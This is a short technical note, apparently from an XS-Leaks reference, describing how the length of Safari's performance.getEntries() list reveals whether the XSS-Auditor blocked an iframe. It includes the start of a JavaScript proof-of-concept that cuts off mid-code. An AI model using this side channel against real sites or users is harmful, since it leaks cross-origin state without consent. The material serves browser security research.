XS-Leaks - Detecting XSS-Auditor in Safari
Safari (13.0.4 and newer) will not log iframe requests in the Performance API list, when the iframe page is blocked by the XSS-Auditor. So the length of performance.getEntries() can leak the status of the Auditor. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 const check = async(url) => { let perfEntries = performance.getEntries().length return new Promise(r => { let frame = document.createElement('iframe') frame.src = url frame....